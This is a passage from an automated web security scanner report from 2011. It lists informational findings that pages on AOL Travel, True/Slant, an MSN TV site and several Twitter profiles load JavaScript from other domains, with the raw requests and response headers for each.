P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=a08b4d7ef3970ad6780f87b910dbac7c; expires=Sat, 25-Jan-2031 02:58:16 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 25806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://travel.aol.com
Path:	/$\|http:/netscape.aol.com/$\|http:/music.aol.com/radioguide/bb/$\|http:/money.aol.com/$\|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$\|http:/www.weblogs.com/$\|http:/smallbusiness.aol.com/$\|http:/www.blackvoices.com/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The response dynamically includes the following scripts from other domains:

http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/js/mg2.js
http://o.aolcdn.com/os/aol/jquery-1.4.2.min.js
http://o.aolcdn.com/os/travel/travel-old-app/js/globalScript.js

Request

Response

HTTP/1.1 404 /$%7Chttp:/netscape.aol.com/$%7Chttp:/music.aol.com/radioguide/bb/$%7Chttp:/money.aol.com/$%7Chttp:/www.aim.com/help_faq/starting_out/buddylist.adp/$%7Chttp:/www.weblogs.com/$%7Chttp:/smallbusiness.aol.com/$%7Chttp:/www.blackvoices.com/$%7Chttp:/latino.aol.com/$%7C.ivillage.com.*/1%7Cwww.ivillage.com/(celeb-news%7Centertainment-photos%7Ctv%7Cfor-kids%7Cvideo%7Centertainment%7Cmovies%7Cfood%7Crecipes%7Ctable-talk%7Cfood-for-kids%7Cfood-advice%7Cfood-news%7Cfood-video
Date: Sun, 30 Jan 2011 01:51:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=24C8300C2A06E9010602B17132ED72CA; Path=/
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Length: 53066

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/js/mg2.js"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://o.aolcdn.com/os/aol/jquery-1.4.2.min.js"></script>

   <script type="text/javascript" src="http://o.aolcdn.com/os/travel/travel-old-app/js/globalScript.js"></script>
   <script type="text/javascript" language="JavaScript1.1" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...

23.390. http://trueslant.com/milesobrien/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trueslant.com
Path:	/milesobrien/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /milesobrien/ HTTP/1.1
Host: trueslant.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.391. http://tv.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tv.redacted
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js

Request

GET / HTTP/1.1
Host: tv.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 69709
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=dfa3666ab2b24263815b585d8424c2c2; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:51:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
MSN TV: Ho
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.392. http://tv.redacted/tv/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tv.redacted
Path:	/tv/article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js

Request

GET /tv/article.aspx?news=625552&gt1=28103 HTTP/1.1
Host: tv.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.393. http://twitter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a2.twimg.com/a/1296265969/javascripts/fronts.js
http://a2.twimg.com/a/1296265969/javascripts/widgets/widget.js?1296269366
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.394. http://twitter.com/HelenASPopkin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/HelenASPopkin

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268125
http://a1.twimg.com/a/1296265969/javascripts/dismissable.js?1296268125
http://a1.twimg.com/a/1296265969/javascripts/geov1.js?1296268125
http://a1.twimg.com/a/1296265969/javascripts/twitter.js?1296268125
http://a3.twimg.com/a/1296265969/javascripts/api.js?1296268125
http://a3.twimg.com/a/1296265969/javascripts/lib/gears_init.js?1296268125
http://a3.twimg.com/a/1296265969/javascripts/lib/jquery.tipsy.min.js?1296268125
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /HelenASPopkin HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:02:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296356567-38386-11000
ETag: "ea52c5afedc85cb07c6fff4a75310922"
Last-Modified: Sun, 30 Jan 2011 03:02:47 GMT
X-Runtime: 0.01712
Content-Type: text/html; charset=utf-8
Content-Length: 52277
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296356567344651; path=/; expires=Sun, 06-Feb-11 03:02:47 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635656738576607; path=/; expires=Tue, 01 Mar 2011 03:02:47 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWMwOWVkYzE1OTI2MDk0NDQ1ZGJiYjRjMmFiYmJlNTNlIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIW2nf1C0B--6f9e351ce1cfdf99abad41c8d129848e96fc4a8b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/twitter.js?1296268125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/lib/jquery.tipsy.min.js?1296268125" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/lib/gears_init.js?1296268125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268125" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/geov1.js?1296268125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/api.js?1296268125" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268125" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/dismissable.js?1296268125" type="text/javascript"></script>
...[SNIP]...

23.395. http://twitter.com/MichaelWann previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/MichaelWann

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296269366
http://a0.twimg.com/a/1296265969/javascripts/twitter.js?1296269366
http://a1.twimg.com/a/1296265969/javascripts/dismissable.js?1296269366
http://a1.twimg.com/a/1296265969/javascripts/geov1.js?1296269366
http://a3.twimg.com/a/1296265969/javascripts/api.js?1296269366
http://a3.twimg.com/a/1296265969/javascripts/lib/gears_init.js?1296269366
http://a3.twimg.com/a/1296265969/javascripts/lib/jquery.tipsy.min.js?1296269366
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /MichaelWann HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:02:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296356547-81727-2377
ETag: "8262f10ce7c81e5136cabe2a78847bad"
Last-Modified: Sun, 30 Jan 2011 03:02:27 GMT
X-Runtime: 0.01194
Content-Type: text/html; charset=utf-8
Content-Length: 52843
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296356547913422; path=/; expires=Sun, 06-Feb-11 03:02:27 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635654792136829; path=/; expires=Tue, 01 Mar 2011 03:02:27 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTNmZTg1NjI1MTBlYzM3OTk0YzQwOGRkYTcxODQyOTYzIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIUh3f1C0B--ba2b2e85d86e8242c7c9defb78d02e28bd4f565e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/twitter.js?1296269366" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/lib/jquery.tipsy.min.js?1296269366" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/lib/gears_init.js?1296269366" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296269366" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/geov1.js?1296269366" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/api.js?1296269366" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296269366" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/dismissable.js?1296269366" type="text/javascript"></script>
...[SNIP]...

23.396. http://twitter.com/windabenedetti previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/windabenedetti

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268125
http://a1.twimg.com/a/1296265969/javascripts/dismissable.js?1296268125
http://a1.twimg.com/a/1296265969/javascripts/geov1.js?1296268125
http://a1.twimg.com/a/1296265969/javascripts/twitter.js?1296268125
http://a3.twimg.com/a/1296265969/javascripts/api.js?1296268125
http://a3.twimg.com/a/1296265969/javascripts/lib/gears_init.js?1296268125
http://a3.twimg.com/a/1296265969/javascripts/lib/jquery.tipsy.min.js?1296268125
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /windabenedetti HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:02:57 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296356577-57560-43117
ETag: "37e7d4764aa4356aeb8c7f93b34df6b0"
Last-Modified: Sun, 30 Jan 2011 03:02:57 GMT
X-Runtime: 0.00997
Content-Type: text/html; charset=utf-8
Content-Length: 49069
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296356577758623; path=/; expires=Sun, 06-Feb-11 03:02:57 GMT; domain=.twitter.com
Set-Cookie: guest_id=12963565777757520; path=/; expires=Tue, 01 Mar 2011 03:02:57 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWZiZjBlYjQ4OTMwMGMzOTA3Nzg4OTQxNTc0YzEzN2JmIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI8JHf1C0B--5fe442064eb48ecd736f8d0fc43646e6d9ffb6d4; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/twitter.js?1296268125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/lib/jquery.tipsy.min.js?1296268125" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/lib/gears_init.js?1296268125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268125" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/geov1.js?1296268125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/api.js?1296268125" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268125" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/dismissable.js?1296268125" type="text/javascript"></script>
...[SNIP]...

23.397. http://twitter.com/wjrothman previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/wjrothman

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268125
http://a1.twimg.com/a/1296265969/javascripts/dismissable.js?1296268125
http://a1.twimg.com/a/1296265969/javascripts/geov1.js?1296268125
http://a1.twimg.com/a/1296265969/javascripts/twitter.js?1296268125
http://a3.twimg.com/a/1296265969/javascripts/api.js?1296268125
http://a3.twimg.com/a/1296265969/javascripts/lib/gears_init.js?1296268125
http://a3.twimg.com/a/1296265969/javascripts/lib/jquery.tipsy.min.js?1296268125
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /wjrothman HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 18:55:19 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296413719-4434-25111
ETag: "75cfb46afa1436d39a8b9e0c50c70e37"
Last-Modified: Sun, 30 Jan 2011 18:55:19 GMT
X-Runtime: 0.02204
Content-Type: text/html; charset=utf-8
Content-Length: 49632
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296413719421374; path=/; expires=Sun, 06-Feb-11 18:55:19 GMT; domain=.twitter.com
Set-Cookie: guest_id=129641371945829376; path=/; expires=Tue, 01 Mar 2011 18:55:19 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTBlZTMzYjgwYjMzOGM4ZDQ5NmQxNzY1ODAxZTM4OTU3Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIpHtH2C0B--ba9d5d1834ac29d7d8bf248a700f2eed994eb117; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/twitter.js?1296268125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/lib/jquery.tipsy.min.js?1296268125" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/lib/gears_init.js?1296268125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268125" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/geov1.js?1296268125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/api.js?1296268125" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268125" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/dismissable.js?1296268125" type="text/javascript"></script>
...[SNIP]...

23.398. http://twitter.com/wjrothman previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/wjrothman

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296265969/javascripts/api.js?1296268742
http://a0.twimg.com/a/1296265969/javascripts/lib/gears_init.js?1296268742
http://a0.twimg.com/a/1296265969/javascripts/lib/jquery.tipsy.min.js?1296268742
http://a1.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268742
http://a2.twimg.com/a/1296265969/javascripts/dismissable.js?1296268742
http://a2.twimg.com/a/1296265969/javascripts/geov1.js?1296268742
http://a2.twimg.com/a/1296265969/javascripts/twitter.js?1296268742
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /wjrothman HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:02:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296356563-11223-39959
ETag: "067321df962e685b47091af05f4b9fbc"
Last-Modified: Sun, 30 Jan 2011 03:02:43 GMT
X-Runtime: 0.01619
Content-Type: text/html; charset=utf-8
Content-Length: 49641
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296356563232205; path=/; expires=Sun, 06-Feb-11 03:02:43 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635656362644604; path=/; expires=Tue, 01 Mar 2011 03:02:43 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTVjMmFiMWM4ZTg4ZjRhNmE2N2QyZTlhMzYyMDlkNTNlIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIrFrf1C0B--3aa7bb9fe9c6795ddbbf9680544888cbf7541ea2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296265969/javascripts/twitter.js?1296268742" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/lib/jquery.tipsy.min.js?1296268742" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/lib/gears_init.js?1296268742" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268742" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296265969/javascripts/geov1.js?1296268742" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/api.js?1296268742" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268742" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296265969/javascripts/dismissable.js?1296268742" type="text/javascript"></script>
...[SNIP]...

23.399. https://twitter.com/ToddKenreck previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/ToddKenreck

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
https://si0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296269366
https://si1.twimg.com/a/1296265969/javascripts/dismissable.js?1296269366
https://si1.twimg.com/a/1296265969/javascripts/geov1.js?1296269366
https://si3.twimg.com/a/1296265969/javascripts/api.js?1296269366
https://si3.twimg.com/a/1296265969/javascripts/lib/gears_init.js?1296269366
https://si3.twimg.com/a/1296265969/javascripts/lib/jquery.tipsy.min.js?1296269366
https://si3.twimg.com/a/1296265969/javascripts/twitter-https.js
https://www.google.com/jsapi

Request

GET /ToddKenreck HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:03:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296356581-64489-22662
ETag: "64fd45f3d163ffe5f3eb5309c6bbafbb"
Last-Modified: Sun, 30 Jan 2011 03:03:01 GMT
X-Runtime: 0.01332
Content-Type: text/html; charset=utf-8
Content-Length: 38284
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296356581648173; path=/; expires=Sun, 06-Feb-11 03:03:01 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635658185310608; path=/; expires=Tue, 01 Mar 2011 03:03:01 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCN%252Bh39QtAToHaWQiJTZkNWFlYzNiNjc5OTZk%250AN2JjM2EyOTg3YzdkNWU2Y2U5IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--0004367452c498e4750ca5a1e95bbdef70cffad9; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296265969/javascripts/twitter-https.js" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296265969/javascripts/lib/jquery.tipsy.min.js?1296269366" type="text/javascript"></script>
<script type='text/javascript' src='https://www.google.com/jsapi'></script>
<script src="https://si3.twimg.com/a/1296265969/javascripts/lib/gears_init.js?1296269366" type="text/javascript"></script>
<script src="https://si0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296269366" type="text/javascript"></script>
<script src="https://si1.twimg.com/a/1296265969/javascripts/geov1.js?1296269366" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296265969/javascripts/api.js?1296269366" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="https://si0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296269366" type="text/javascript"></script>
<script src="https://si1.twimg.com/a/1296265969/javascripts/dismissable.js?1296269366" type="text/javascript"></script>
...[SNIP]...

23.400. https://twitter.com/ToddKenreck previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/ToddKenreck

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
https://si0.twimg.com/a/1296265969/javascripts/api.js?1296268742
https://si0.twimg.com/a/1296265969/javascripts/lib/gears_init.js?1296268742
https://si0.twimg.com/a/1296265969/javascripts/lib/jquery.tipsy.min.js?1296268742
https://si1.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268742
